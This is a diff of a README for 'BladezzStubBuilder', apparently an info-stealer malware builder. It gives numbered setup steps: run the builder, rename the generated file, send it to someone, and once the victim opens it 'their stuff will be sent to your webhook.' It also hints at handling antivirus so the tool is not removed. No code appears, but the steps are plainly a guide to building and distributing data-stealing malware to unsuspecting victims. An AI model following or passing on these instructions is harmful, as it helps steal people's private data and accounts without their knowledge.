Brokenbladezz/BladezzStubBuilder/README.md

 Setup

-Download the zip
+1.Download the zip
-open the file
+2.open the file
-Extract the zip inside it
+3.Extract the zip inside it
+4.turn on antivirus it might delete important files 5.open the .exe file
+6.then open installpy file
+7.then open the build.bat file
+8.follow the instructions
-turn on antivirus it might delete important files open the .exe file then open installpy file then open the build.bat file follow the instructions open the dist folder rename your file in the dist folder send it to somebody once they download and open your file their stuff will be sent to your webhook.
+9.open the dist folder
+10.rename your file in the dist folder
+11.send it to somebody
+12.once they download and open your file their stuff will be sent to your webhook.